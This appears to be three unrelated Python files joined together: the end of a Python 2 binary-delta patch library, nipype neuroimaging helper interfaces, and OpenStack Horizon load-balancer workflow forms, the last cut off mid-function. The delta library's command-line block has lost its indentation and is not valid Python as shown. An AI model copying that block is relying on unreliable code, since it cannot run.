    """
    stream = __delta(sig_file, new_file)
    if delta_file is None:
        return stream
    for chunk in stream:
        delta_file.write(chunk)
def __patch(basis_file, delta_file):
    """Yield the reconstructed file contents by applying *delta_file*'s
    instructions against *basis_file*.

    Raises on a malformed delta or when the final whole-file hash does not
    match the 'H' trailer. NOTE(review): Python 2 str semantics assumed
    (string comparisons against binary reads); confirm before porting.
    """
    # Verify the file is for us
    if not delta_file.read(7) == 'bdifdlt':
        raise Exception('Not a bdiff delta file')
    # Get the version number
    version_bytes = delta_file.read(4)
    version = int(struct.unpack('i', version_bytes)[0])
    if version == 2:
        # Get block size from delta_file
        block_size = int(struct.unpack('i', delta_file.read(4))[0])
        file_h = sha256()
        # Stays '' unless an 'H' trailer is found; '' can never equal a
        # real digest, so a truncated delta fails the final check below.
        file_h_target = ''
        # Read the instructions from the delta_file
        while True:
            mode = delta_file.read(1)
            if not mode:
                break
            if mode == 'C':
                # Copy mode. Get the data from basis_file
                block_number = int(struct.unpack('i', delta_file.read(4))[0])
                basis_file.seek(block_number * block_size)
                data = basis_file.read(block_size)
            elif mode == 'D':
                # Delta mode. Get the data from the delta file
                data = delta_file.read(block_size)
            elif mode == 'E':
                # Delta mode but with a short block (EOF)
                delta_bytes = int(struct.unpack('i', delta_file.read(4))[0])
                data = delta_file.read(delta_bytes)
            elif mode == 'H':
                # Found the complete file hash. new_file should match this.
                file_h_target = delta_file.read(32)
                break
            else:
                raise Exception("Incorrectly formatted delta file")
            file_h.update(data)
            yield data
        if not file_h.digest() == file_h_target:
            raise Exception("Hash mismatch in new file")
    else:
        raise Exception("Unknown delta file version")
def patch(basis_file, delta_file, new_file = None):
    """Patch basis_file using the instructions in delta_file.

    Arguments:
    basis_file: The original file from which the signature was created
    delta_file: The file object containing the patch instructions
    new_file: (Optional) The final patched file object; when omitted a
        generator over the reconstructed chunks is returned.
    """
    stream = __patch(basis_file, delta_file)
    if new_file is None:
        return stream
    for chunk in stream:
        new_file.write(chunk)
# This library isn't really meant to be used from the command line except
# for some rudimentary testing. Thus, the below code has very little error
# checking or polish.
if __name__ == '__main__':
from sys import argv
if argv[1] == "sig":
# Command line params:
# basis_file sig_file
try:
with open(argv[2],'rb') as basis_file:
with open(argv[3],'wb') as sig_file:
signature(basis_file, sig_file)
except IOError:
print "signature problem"
elif argv[1] == "delta":
# Command line params:
# sig_file new_file delta
try:
with open(argv[2],'rb') as sig_file:
with open(argv[3],'rb') as new_file:
with open(argv[4],'wb') as delta_file:
delta(sig_file, new_file, delta_file)
except IOError:
print "delta problem"
elif argv[1] == "patch":
# Command line params:
# basis_file delta_file new_file
try:
with open(argv[2],'rb') as basis_file:
with open(argv[3],'rb') as delta_file:
with open(argv[4],'wb') as new_file:
patch(basis_file, delta_file, new_file)
except IOError:
print "patch problem"
else:
print "Must specific one of sig, delta or patch"
|
|
import os
import re
import gzip
import shutil
import gzip
import subprocess
import nibabel as nib
import ntpath
import pandas as pd
import numpy as np
import tempfile
import nibabel as nib
from nipype.interfaces.base import (TraitedSpec, File, traits, InputMultiPath, CommandLine, CommandLineInputSpec,
BaseInterface, OutputMultiPath, BaseInterfaceInputSpec, isdefined)
def nib_load_3d(fn):
    """Load *fn* with nibabel and return it as a strictly 3D Nifti1Image.

    Assumes any dimensions beyond the first three are singletons (e.g. a
    (x, y, z, 1) volume); reshape raises otherwise.
    """
    img = nib.load(fn)
    # NOTE(review): get_data() is deprecated in recent nibabel releases in
    # favour of get_fdata()/np.asanyarray(img.dataobj) -- confirm the pinned
    # nibabel version before changing, since returned dtypes differ.
    vol = img.get_data()
    vol = vol.reshape(vol.shape[0:3])
    img_3d = nib.Nifti1Image(vol, img.affine)
    return img_3d
def cmd(command):
    """Run *command* through the shell, echoing its combined output.

    Returns the captured stdout+stderr on success (callers that ignored the
    previous None return are unaffected). Aborts the process with exit
    status 1 when the command fails, after printing the failure details.
    """
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT,
                                         shell=True, universal_newlines=True)
    except subprocess.CalledProcessError as exc:
        print("Status : FAIL", exc.returncode, exc.output)
        # Preserve the original abort-the-process behaviour, but raise
        # SystemExit directly rather than relying on the site-provided
        # exit() helper (absent under python -S).
        raise SystemExit(1)
    else:
        print("Output: \n{}\n".format(output))
        return output
def splitext(s):
    """Split path *s* into [base, ext], where ext is everything from the
    first '.' of the basename (so multi-part extensions like '.nii.gz'
    stay together).

    Returns *s* unchanged when it is not path-like, mirroring the original
    best-effort behaviour.
    """
    try:
        parts = os.path.basename(s).split('.')
    except (TypeError, AttributeError):
        return s
    if len(parts) < 2:
        # No dot in the basename: no extension. (The old re.sub-based code
        # produced ['', '.'] here because the pattern '.' matched every
        # character of s.)
        return [s, '']
    ext = '.' + '.'.join(parts[1:])
    # Strip the extension by length rather than re.sub(ext, '', s): the
    # dots in ext were regex wildcards and could mangle unrelated parts
    # of the path.
    return [s[:-len(ext)], ext]
def gz(ii, oo):
    """Gzip-compress the file at path *ii* into a new file at path *oo*."""
    with open(ii, 'rb') as src, gzip.open(oo, 'wb') as dst:
        shutil.copyfileobj(src, dst)
def gunzip(ii, oo):
    """Decompress the gzip file at path *ii* into a plain file at *oo*."""
    with gzip.open(ii, 'rb') as src, open(oo, 'wb') as dst:
        shutil.copyfileobj(src, dst)
def check_gz(in_file_fn):
    """Return a plain-.nii path for *in_file_fn*, decompressing if needed.

    Gzipped inputs are decompressed into a private temporary directory and
    the new path is returned; other inputs are returned unchanged. An
    accompanying .sif sidecar, when present, is copied to /tmp so tools
    that look it up next to the image can still find it.
    """
    img, ext = splitext(in_file_fn)
    if '.gz' in ext:
        # os.path.join puts the file INSIDE the fresh temp dir; the old
        # string concatenation dropped the separator, creating a mangled
        # sibling of the directory instead.
        out_file_fn = os.path.join(tempfile.mkdtemp(),
                                   os.path.basename(img) + '.nii')
        sif = img + '.sif'
        if os.path.exists(sif):
            shutil.copy(sif, '/tmp/' + os.path.basename(img) + '.sif')
        gunzip(in_file_fn, out_file_fn)
        return out_file_fn
    else:
        return in_file_fn
class separate_mask_labelsOutput(TraitedSpec):
    # 4D image: one binary volume per non-zero label of the input mask.
    out_file=traits.File(argstr="%s", desc="4D label image")
class separate_mask_labelsInput(TraitedSpec):
    # Integer-labelled 3D mask to split into per-label volumes.
    in_file=traits.File(argstr="%s", desc="3D label image")
    # Optional output path; generated from in_file when left undefined.
    out_file=traits.File(argstr="%s", desc="4D label image")
class separate_mask_labelsCommand(BaseInterface ):
    """Split an integer-labelled 3D mask into a 4D image holding one
    binary volume per non-zero label value."""
    input_spec = separate_mask_labelsInput
    output_spec = separate_mask_labelsOutput
    def _run_interface(self, runtime):
        vol = nib.load(self.inputs.in_file)
        # NOTE(review): get_data()/get_affine() are deprecated in newer
        # nibabel releases -- confirm the pinned version before changing.
        data = vol.get_data()
        # Drop trailing singleton dimensions so data is strictly 3D.
        data = data.reshape(*data.shape[0:3])
        if not isdefined(self.inputs.out_file) :
            self.inputs.out_file = self._gen_outputs(self.inputs.in_file)
        unique = np.unique( data ).astype(int)
        # One output channel per non-zero label; assumes the background
        # value 0 is present in the mask.
        nUnique = len(unique)-1
        out = np.zeros( [data.shape[0], data.shape[1], data.shape[2], nUnique] )
        print('unique', unique)
        print('shape',out.shape)
        print('data', data.shape)
        for t,i in enumerate( unique ) :
            if i != 0 :
                # t-1 skips the background entry at t==0.
                # NOTE(review): if 0 is absent, the first label writes to
                # channel -1 (the last one) -- confirm inputs always
                # contain background.
                print(t-1, i )
                out[ data == i, t-1 ] = 1
        out_file=nib.Nifti1Image(out, vol.get_affine(), vol.header)
        out_file.to_filename(self.inputs.out_file)
        return(runtime)
    def _gen_outputs(self, fn) :
        # e.g. /path/sub.nii.gz -> $CWD/sub_4d.nii.gz
        fn_split = splitext(fn)
        return os.getcwd() + os.sep + os.path.basename( fn_split[0] ) + "_4d" + fn_split[1]
    def _list_outputs(self):
        outputs = self.output_spec().get()
        if not isdefined(self.inputs.out_file) :
            self.inputs.out_file = self._gen_outputs(self.inputs.in_file)
        outputs["out_file"] = self.inputs.out_file
        return outputs
class concat_dfOutput(TraitedSpec):
    # CSV file holding the row-wise concatenation of the inputs.
    out_file = traits.File(desc="Output file")
class concat_dfInput(BaseInterfaceInputSpec):
    # CSV file paths to concatenate, in order.
    in_list = traits.List(mandatory=True, exists=True, desc="Input list")
    # Name of the CSV written into the working directory.
    out_file = traits.File(mandatory=True, desc="Output file")
    test = traits.Bool(default=False, usedefault=True, desc="Flag for if df is part of test run of pipeline")
class concat_df(BaseInterface):
    """Row-wise concatenation of a list of CSV files into a single CSV."""
    input_spec = concat_dfInput
    output_spec = concat_dfOutput
    def _run_interface(self, runtime):
        # The `test` flag is accepted but currently only used for debugging.
        test = self.inputs.test
        frames = [pd.read_csv(csv_fn) for csv_fn in self.inputs.in_list]
        stacked = pd.concat([pd.DataFrame([])] + frames, axis=0)
        stacked.to_csv(self.inputs.out_file, index=False)
        return runtime
    def _list_outputs(self):
        outputs = self.output_spec().get()
        outputs["out_file"] = os.getcwd() + os.sep + self.inputs.out_file
        return outputs
class ConcatOutput(TraitedSpec):
    # Image produced by concatenating the inputs.
    out_file = File(exists=True, desc="resampled image")
class ConcatInput(CommandLineInputSpec):
    # Input spec for a command-line image-concatenation tool.
    # NOTE(review): flag names (-concat_dimension, -clobber) look like a
    # MINC tool (mincconcat) -- the command itself is defined elsewhere.
    in_file = InputMultiPath(File(mandatory=True), position=0, argstr='%s', desc='List of input images.')
    out_file = File(position=1, argstr="%s", mandatory=True, desc="Output image.")
    dimension = traits.Str(argstr="-concat_dimension %s", desc="Concatenate along a given dimension.")
    start = traits.Float(argstr="-start %s", desc="Starting coordinate for new dimension.")
    step = traits.Float(argstr="-step %s", desc="Step size for new dimension.")
    clobber = traits.Bool(argstr="-clobber", usedefault=True, default_value=True, desc="Overwrite output file")
    verbose = traits.Bool(argstr="-verbose", usedefault=True, default_value=True, desc="Write messages indicating progress")
class copyOutput(TraitedSpec):
    # Path of the copied file.
    output_file=traits.File(argstr="%s", desc="input")
class copyInput(TraitedSpec):
    # File to copy.
    input_file=traits.File(argstr="%s", desc="input")
    # Destination; defaults to the basename placed in the working directory.
    output_file=traits.File(argstr="%s", desc="output")
class copyCommand(BaseInterface):
    """Copy the input file, defaulting the destination to the current
    working directory with the same basename."""
    input_spec = copyInput
    output_spec = copyOutput
    def _run_interface(self, runtime):
        if not isdefined(self.inputs.output_file):
            self.inputs.output_file = self._gen_output(self.inputs.input_file)
        shutil.copy(self.inputs.input_file, self.inputs.output_file)
        return runtime
    def _gen_output(self, fn):
        # Default destination: same basename, placed in the cwd.
        destination = os.getcwd() + os.sep + os.path.basename(fn)
        return destination
    def _list_outputs(self):
        if not isdefined(self.inputs.output_file):
            self.inputs.output_file = self._gen_output(self.inputs.input_file)
        outputs = self.output_spec().get()
        outputs["output_file"] = self.inputs.output_file
        return outputs
# In theory, this information should be contained in the image header.
# Often, however, it is either missing from the header or stored under an
# unexpected variable name (e.g., "Patient_Weight", "body_weight", "weight").
# One way around this is to let the user supply a .csv file mapping subject
# name to the parameter of interest: if the parameter cannot be read from the
# header, it can still be read from that text file.
class subject_parameterOutput(TraitedSpec):
    # Extracted parameter value, stored as a string.
    parameter=traits.String(argstr="%s", desc="Subject parameter")
class subject_parameterInput(TraitedSpec):
    # Either a header key name, or the path of a CSV mapping sid -> value.
    parameter_name=traits.String(argstr="%s", desc="File containing subject parameters")
    header = traits.Dict(desc="Python dictionary containing PET header")
    # Output: extracted parameter value as a string.
    parameter=traits.String(argstr="%s", desc="Subject parameter")
    sid=traits.String(desc="Subject ID")
class subject_parameterCommand(BaseInterface ):
    """Extract a per-subject parameter either from a sid->value CSV file
    or, failing that, from the PET header dictionary."""
    input_spec = subject_parameterInput
    output_spec = subject_parameterOutput
    def _run_interface(self, runtime):
        parameter_name = self.inputs.parameter_name
        header = self.inputs.header
        sid = self.inputs.sid
        if os.path.exists(parameter_name):
            # Case 1: parameter_name is a CSV file (col 0 = subject id,
            # col 1 = value) -- read the value for this sid from it.
            df=pd.read_csv(parameter_name, header=None)
            parameter=df.iloc[:, 1][ df.iloc[:,0] == sid ].values[0]
        # Case 2: parameter_name is the name of a header field.
        else:
            # NOTE(review): _finditem is defined elsewhere in this package;
            # presumably a recursive dict search -- confirm.
            parameter=_finditem(header, parameter_name)
            if type(parameter) == list:
                parameter=parameter[0]
        # Convert scientific-notation numbers to plain floating point,
        # stored as a string; non-numeric values pass through unchanged.
        try:
            parameter=format(float(parameter), 'f')
        except ValueError: pass
        self.inputs.parameter=str(parameter)
        return(runtime)
    def _list_outputs(self):
        outputs = self.output_spec().get()
        outputs["parameter"] = self.inputs.parameter
        return outputs
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import fields
from horizon.utils import validators
from horizon import workflows
from openstack_dashboard import api
# Protocols and load-balancing methods offered by the LBaaS pool forms.
AVAILABLE_PROTOCOLS = ('HTTP', 'HTTPS', 'TCP')
AVAILABLE_METHODS = ('ROUND_ROBIN', 'LEAST_CONNECTIONS', 'SOURCE_IP')
class AddPoolAction(workflows.Action):
    """Workflow action collecting the attributes of a new LBaaS pool."""
    name = forms.CharField(max_length=80, label=_("Name"))
    description = forms.CharField(
        initial="", required=False,
        max_length=80, label=_("Description"))
    # provider is optional because some LBaaS implementation does
    # not support service-type extension.
    provider = forms.ChoiceField(label=_("Provider"), required=False)
    subnet_id = forms.ChoiceField(label=_("Subnet"))
    protocol = forms.ChoiceField(label=_("Protocol"))
    lb_method = forms.ChoiceField(label=_("Load Balancing Method"))
    admin_state_up = forms.BooleanField(label=_("Admin State"),
                                        initial=True, required=False)

    def __init__(self, request, *args, **kwargs):
        super(AddPoolAction, self).__init__(request, *args, **kwargs)
        tenant_id = request.user.tenant_id
        subnet_id_choices = [('', _("Select a Subnet"))]
        try:
            networks = api.neutron.network_list_for_tenant(request, tenant_id)
        except Exception:
            exceptions.handle(request,
                              _('Unable to retrieve networks list.'))
            networks = []
        for n in networks:
            for s in n['subnets']:
                subnet_id_choices.append((s.id, s.cidr))
        self.fields['subnet_id'].choices = subnet_id_choices
        protocol_choices = [('', _("Select a Protocol"))]
        # extend() replaces the previous side-effect-only list
        # comprehensions, which built and discarded throwaway lists.
        protocol_choices.extend((p, p) for p in AVAILABLE_PROTOCOLS)
        self.fields['protocol'].choices = protocol_choices
        lb_method_choices = [('', _("Select a Method"))]
        lb_method_choices.extend((m, m) for m in AVAILABLE_METHODS)
        self.fields['lb_method'].choices = lb_method_choices
        # provider choice: only offered when the service-type extension is
        # available; otherwise the field is made read-only with a notice.
        try:
            if api.neutron.is_extension_supported(request, 'service-type'):
                provider_list = api.neutron.provider_list(request)
                providers = [p for p in provider_list
                             if p['service_type'] == 'LOADBALANCER']
            else:
                providers = None
        except Exception:
            exceptions.handle(request,
                              _('Unable to retrieve providers list.'))
            providers = []
        if providers:
            default_providers = [p for p in providers if p.get('default')]
            if default_providers:
                default_provider = default_providers[0]['name']
            else:
                default_provider = None
            provider_choices = [(p['name'], p['name']) for p in providers
                                if p['name'] != default_provider]
            if default_provider:
                # List the default provider first, clearly marked.
                provider_choices.insert(
                    0, (default_provider,
                        _("%s (default)") % default_provider))
        else:
            if providers is None:
                msg = _("Provider for Load Balancer is not supported")
            else:
                msg = _("No provider is available")
            provider_choices = [('', msg)]
            self.fields['provider'].widget.attrs['readonly'] = True
        self.fields['provider'].choices = provider_choices

    class Meta:
        name = _("Add New Pool")
        permissions = ('openstack.services.network',)
        help_text = _("Create Pool for current project.\n\n"
                      "Assign a name and description for the pool. "
                      "Choose one subnet where all members of this "
                      "pool must be on. "
                      "Select the protocol and load balancing method "
                      "for this pool. "
                      "Admin State is UP (checked) by default.")
class AddPoolStep(workflows.Step):
    # Step wrapping AddPoolAction; feeds its cleaned data into the context.
    action_class = AddPoolAction
    contributes = ("name", "description", "subnet_id", "provider",
                   "protocol", "lb_method", "admin_state_up")
    def contribute(self, data, context):
        context = super(AddPoolStep, self).contribute(data, context)
        if data:
            return context
        # NOTE(review): implicitly returns None when `data` is falsy --
        # appears intentional (skip contribution on empty data), but
        # confirm against workflows.Step.contribute's contract.
class AddPool(workflows.Workflow):
    """Workflow that creates a new LBaaS pool."""
    slug = "addpool"
    name = _("Add Pool")
    finalize_button_name = _("Add")
    success_message = _('Added pool "%s".')
    failure_message = _('Unable to add pool "%s".')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (AddPoolStep,)
    def format_status_message(self, message):
        # Interpolate the pool name into the success/failure templates.
        return message % self.context.get('name')
    def handle(self, request, context):
        try:
            api.lbaas.pool_create(request, **context)
        except Exception:
            return False
        return True
class AddVipAction(workflows.Action):
    """Workflow action collecting the attributes of a VIP for a pool."""
    name = forms.CharField(max_length=80, label=_("Name"))
    description = forms.CharField(
        initial="", required=False,
        max_length=80, label=_("Description"))
    floatip_address = forms.ChoiceField(
        label=_("VIP Address from Floating IPs"),
        widget=forms.Select(attrs={'disabled': 'disabled'}),
        required=False)
    other_address = fields.IPField(required=False,
                                   initial="",
                                   version=fields.IPv4,
                                   mask=False)
    protocol_port = forms.IntegerField(label=_("Protocol Port"), min_value=1,
                                       help_text=_("Enter an integer value "
                                                   "between 1 and 65535."),
                                       validators=[validators.validate_port_range])
    protocol = forms.ChoiceField(label=_("Protocol"))
    session_persistence = forms.ChoiceField(
        required=False, initial={}, label=_("Session Persistence"),
        widget=forms.Select(attrs={
            'class': 'switchable',
            'data-slug': 'persistence'
        }))
    cookie_name = forms.CharField(
        initial="", required=False,
        max_length=80, label=_("Cookie Name"),
        help_text=_("Required for APP_COOKIE persistence;"
                    " Ignored otherwise."),
        widget=forms.TextInput(attrs={
            'class': 'switched',
            'data-switch-on': 'persistence',
            'data-persistence-app_cookie': 'APP_COOKIE',
        }))
    connection_limit = forms.IntegerField(
        required=False, min_value=-1, label=_("Connection Limit"),
        help_text=_("Maximum number of connections allowed "
                    "for the VIP or '-1' if the limit is not set"))
    admin_state_up = forms.BooleanField(
        label=_("Admin State"), initial=True, required=False)

    def __init__(self, request, *args, **kwargs):
        super(AddVipAction, self).__init__(request, *args, **kwargs)
        self.fields['other_address'].label = _("Specify a free IP address"
                                               " from %s") % args[0]['subnet']
        protocol_choices = [('', _("Select a Protocol"))]
        # extend() replaces a side-effect-only list comprehension, which
        # built and discarded a throwaway list.
        protocol_choices.extend((p, p) for p in AVAILABLE_PROTOCOLS)
        self.fields['protocol'].choices = protocol_choices
        session_persistence_choices = [('', _("No Session Persistence"))]
        for mode in ('SOURCE_IP', 'HTTP_COOKIE', 'APP_COOKIE'):
            session_persistence_choices.append((mode.lower(), mode))
        self.fields[
            'session_persistence'].choices = session_persistence_choices
        floatip_address_choices = [('', _("Currently Not Supported"))]
        self.fields['floatip_address'].choices = floatip_address_choices

    def clean(self):
        # Persistence modes are presented lowercase but the API expects
        # uppercase; APP_COOKIE additionally requires a cookie name.
        cleaned_data = super(AddVipAction, self).clean()
        persistence = cleaned_data.get('session_persistence')
        if persistence:
            cleaned_data['session_persistence'] = persistence.upper()
        if (cleaned_data.get('session_persistence') == 'APP_COOKIE' and
                not cleaned_data.get('cookie_name')):
            msg = _('Cookie name is required for APP_COOKIE persistence.')
            self._errors['cookie_name'] = self.error_class([msg])
        return cleaned_data

    class Meta:
        name = _("Specify VIP")
        permissions = ('openstack.services.network',)
        help_text = _("Create a VIP for this pool. "
                      "Assign a name and description for the VIP. "
                      "Specify an IP address and port for the VIP. "
                      "Choose the protocol and session persistence "
                      "method for the VIP."
                      "Specify the max connections allowed. "
                      "Admin State is UP (checked) by default.")
class AddVipStep(workflows.Step):
    # Step wrapping AddVipAction; pool_id and subnet come from the caller.
    action_class = AddVipAction
    depends_on = ("pool_id", "subnet")
    contributes = ("name", "description", "floatip_address",
                   "other_address", "protocol_port", "protocol",
                   "session_persistence", "cookie_name",
                   "connection_limit", "admin_state_up")
    def contribute(self, data, context):
        context = super(AddVipStep, self).contribute(data, context)
        return context
class AddVip(workflows.Workflow):
    """Workflow that creates a VIP for an existing pool."""
    slug = "addvip"
    name = _("Add VIP")
    finalize_button_name = _("Add")
    success_message = _('Added VIP "%s".')
    failure_message = _('Unable to add VIP "%s".')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (AddVipStep,)
    def format_status_message(self, message):
        name = self.context.get('name')
        return message % name
    def handle(self, request, context):
        # Exactly one of floatip_address / other_address may be supplied;
        # whichever is set becomes the 'address' sent to the API.
        if context['other_address'] == '':
            context['address'] = context['floatip_address']
        else:
            if not context['floatip_address'] == '':
                self.failure_message = _('Only one address can be specified. '
                                         'Unable to add VIP "%s".')
                return False
            else:
                context['address'] = context['other_address']
        try:
            pool = api.lbaas.pool_get(request, context['pool_id'])
            context['subnet_id'] = pool['subnet_id']
        except Exception:
            context['subnet_id'] = None
            self.failure_message = _('Unable to retrieve the specified pool. '
                                     'Unable to add VIP "%s".')
            return False
        if context['session_persistence']:
            # Normalise the persistence choice into the dict the API expects.
            stype = context['session_persistence']
            if stype == 'APP_COOKIE':
                cookie = context['cookie_name']
                context['session_persistence'] = {'type': stype,
                                                  'cookie_name': cookie}
            else:
                context['session_persistence'] = {'type': stype}
        else:
            context['session_persistence'] = {}
        try:
            api.lbaas.vip_create(request, **context)
            return True
        except Exception:
            return False
class AddMemberAction(workflows.Action):
    """Workflow action selecting instances to add as pool members."""
    pool_id = forms.ChoiceField(label=_("Pool"))
    members = forms.MultipleChoiceField(
        label=_("Member(s)"),
        required=True,
        initial=["default"],
        widget=forms.CheckboxSelectMultiple(),
        error_messages={'required':
                        _('At least one member must be specified')},
        help_text=_("Select members for this pool "))
    weight = forms.IntegerField(max_value=256, min_value=0, label=_("Weight"),
                                required=False,
                                help_text=_("Relative part of requests this "
                                            "pool member serves compared to others"))
    protocol_port = forms.IntegerField(label=_("Protocol Port"), min_value=1,
                                       help_text=_("Enter an integer value "
                                                   "between 1 and 65535."),
                                       validators=[validators.validate_port_range])
    admin_state_up = forms.BooleanField(label=_("Admin State"),
                                        initial=True, required=False)
    def __init__(self, request, *args, **kwargs):
        super(AddMemberAction, self).__init__(request, *args, **kwargs)
        pool_id_choices = [('', _("Select a Pool"))]
        try:
            tenant_id = self.request.user.tenant_id
            pools = api.lbaas.pool_list(request, tenant_id=tenant_id)
        except Exception:
            pools = []
            exceptions.handle(request,
                              _('Unable to retrieve pools list.'))
        pools = sorted(pools,
                       key=lambda pool: pool.name)
        for p in pools:
            pool_id_choices.append((p.id, p.name))
        self.fields['pool_id'].choices = pool_id_choices
        members_choices = []
        try:
            servers, has_more = api.nova.server_list(request)
        except Exception:
            servers = []
            exceptions.handle(request,
                              _('Unable to retrieve instances list.'))
        if len(servers) == 0:
            # No instances: repurpose the members label as an explanation
            # and relax the other required fields so the form still renders.
            self.fields['members'].label = _(
                "No servers available. To add a member, you "
                "need at least one running instance.")
            # NOTE(review): members stays required=True here while pool_id
            # and protocol_port are relaxed -- possibly meant to be False;
            # confirm the intended form behaviour.
            self.fields['members'].required = True
            self.fields['members'].help_text = _("Select members "
                                                 "for this pool ")
            self.fields['pool_id'].required = False
            self.fields['protocol_port'].required = False
            return
        for m in servers:
            members_choices.append((m.id, m.name))
        self.fields['members'].choices = sorted(
            members_choices,
            key=lambda member: member[1])
    class Meta:
        name = _("Add New Member")
        permissions = ('openstack.services.network',)
        help_text = _("Add member to selected pool.\n\n"
                      "Choose one or more listed instances to be "
                      "added to the pool as member(s). "
                      "Assign a numeric weight for this member "
                      "Specify the port number the member(s) "
                      "operate on; e.g., 80.")
class AddMemberStep(workflows.Step):
    # Step wrapping AddMemberAction.
    action_class = AddMemberAction
    contributes = ("pool_id", "members", "protocol_port", "weight",
                   "admin_state_up")
    def contribute(self, data, context):
        context = super(AddMemberStep, self).contribute(data, context)
        return context
class AddMember(workflows.Workflow):
    """Workflow adding one or more members to a pool."""
    slug = "addmember"
    name = _("Add Member")
    finalize_button_name = _("Add")
    success_message = _('Added member(s).')
    failure_message = _('Unable to add member(s).')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (AddMemberStep,)
    def handle(self, request, context):
        for m in context['members']:
            params = {'device_id': m}
            try:
                plist = api.neutron.port_list(request, **params)
            except Exception:
                return False
            if plist:
                # Use the first fixed IP of the instance's first port.
                # NOTE(review): when an instance has no ports, the address
                # from the previous loop iteration is reused -- confirm
                # this is intended.
                context['address'] = plist[0].fixed_ips[0]['ip_address']
            try:
                # Only the id of the last-created member is kept.
                context['member_id'] = api.lbaas.member_create(
                    request, **context).id
            except Exception:
                return False
        return True
class AddMonitorAction(workflows.Action):
    """Workflow action collecting the attributes of a new health monitor."""
    type = forms.ChoiceField(
        label=_("Type"),
        choices=[('ping', _('PING')),
                 ('tcp', _('TCP')),
                 ('http', _('HTTP')),
                 ('https', _('HTTPS'))],
        widget=forms.Select(attrs={
            'class': 'switchable',
            'data-slug': 'type'
        }))
    delay = forms.IntegerField(
        min_value=1,
        label=_("Delay"),
        help_text=_("The minimum time in seconds between regular checks "
                    "of a member"))
    timeout = forms.IntegerField(
        min_value=1,
        label=_("Timeout"),
        help_text=_("The maximum time in seconds for a monitor to wait "
                    "for a reply"))
    max_retries = forms.IntegerField(
        max_value=10, min_value=1,
        label=_("Max Retries (1~10)"),
        help_text=_("Number of permissible failures before changing "
                    "the status of member to inactive"))
    # The three fields below are only shown (and validated) for the
    # http/https monitor types -- see clean().
    http_method = forms.ChoiceField(
        initial="GET",
        required=False,
        choices=[('GET', _('GET'))],
        label=_("HTTP Method"),
        help_text=_("HTTP method used to check health status of a member"),
        widget=forms.Select(attrs={
            'class': 'switched',
            'data-switch-on': 'type',
            'data-type-http': _('HTTP Method'),
            'data-type-https': _('HTTP Method')
        }))
    url_path = forms.CharField(
        initial="/",
        required=False,
        max_length=80,
        label=_("URL"),
        widget=forms.TextInput(attrs={
            'class': 'switched',
            'data-switch-on': 'type',
            'data-type-http': _('URL'),
            'data-type-https': _('URL')
        }))
    expected_codes = forms.RegexField(
        initial="200",
        required=False,
        max_length=80,
        regex=r'^(\d{3}(\s*,\s*\d{3})*)$|^(\d{3}-\d{3})$',
        label=_("Expected HTTP Status Codes"),
        help_text=_("Expected code may be a single value (e.g. 200), "
                    "a list of values (e.g. 200, 202), "
                    "or range of values (e.g. 200-204)"),
        widget=forms.TextInput(attrs={
            'class': 'switched',
            'data-switch-on': 'type',
            'data-type-http': _('Expected HTTP Status Codes'),
            'data-type-https': _('Expected HTTP Status Codes')
        }))
    admin_state_up = forms.BooleanField(label=_("Admin State"),
                                        initial=True, required=False)
    def __init__(self, request, *args, **kwargs):
        super(AddMonitorAction, self).__init__(request, *args, **kwargs)
    def clean(self):
        # The HTTP-only fields become mandatory for http/https monitors.
        cleaned_data = super(AddMonitorAction, self).clean()
        type_opt = cleaned_data.get('type')
        if type_opt in ['http', 'https']:
            http_method_opt = cleaned_data.get('http_method')
            url_path = cleaned_data.get('url_path')
            expected_codes = cleaned_data.get('expected_codes')
            if not http_method_opt:
                msg = _('Please choose a HTTP method')
                self._errors['http_method'] = self.error_class([msg])
            if not url_path:
                msg = _('Please specify an URL')
                self._errors['url_path'] = self.error_class([msg])
            if not expected_codes:
                msg = _('Please enter a single value (e.g. 200), '
                        'a list of values (e.g. 200, 202), '
                        'or range of values (e.g. 200-204)')
                self._errors['expected_codes'] = self.error_class([msg])
        return cleaned_data
    class Meta:
        name = _("Add New Monitor")
        permissions = ('openstack.services.network',)
        help_text = _("Create a monitor template.\n\n"
                      "Select type of monitoring. "
                      "Specify delay, timeout, and retry limits "
                      "required by the monitor. "
                      "Specify method, URL path, and expected "
                      "HTTP codes upon success.")
class AddMonitorStep(workflows.Step):
    # Step wrapping AddMonitorAction.
    action_class = AddMonitorAction
    contributes = ("type", "delay", "timeout", "max_retries",
                   "http_method", "url_path", "expected_codes",
                   "admin_state_up")
    def contribute(self, data, context):
        context = super(AddMonitorStep, self).contribute(data, context)
        if data:
            return context
        # NOTE(review): implicitly returns None when `data` is falsy, same
        # pattern as AddPoolStep -- confirm against Step.contribute.
class AddMonitor(workflows.Workflow):
    """Workflow that creates a new LBaaS health monitor."""
    slug = "addmonitor"
    name = _("Add Monitor")
    finalize_button_name = _("Add")
    success_message = _('Added monitor')
    failure_message = _('Unable to add monitor')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (AddMonitorStep,)
    def handle(self, request, context):
        try:
            monitor = api.lbaas.pool_health_monitor_create(request, **context)
        except Exception:
            exceptions.handle(request, _("Unable to add monitor."))
            return False
        context['monitor_id'] = monitor.get('id')
        return True
class MonitorMixin():
    """Mixin producing a one-line display summary for a health monitor."""
    def _get_monitor_display_name(self, monitor):
        attrs = ['type', 'delay', 'max_retries', 'timeout']
        if monitor.type in ['HTTP', 'HTTPS']:
            # HTTP-style monitors also expose their probe configuration.
            attrs.extend(['url_path', 'expected_codes', 'http_method'])
            template = _("%(type)s url:%(url_path)s "
                         "method:%(http_method)s codes:%(expected_codes)s "
                         "delay:%(delay)d retries:%(max_retries)d "
                         "timeout:%(timeout)d")
        else:
            template = _("%(type)s delay:%(delay)d "
                         "retries:%(max_retries)d "
                         "timeout:%(timeout)d")
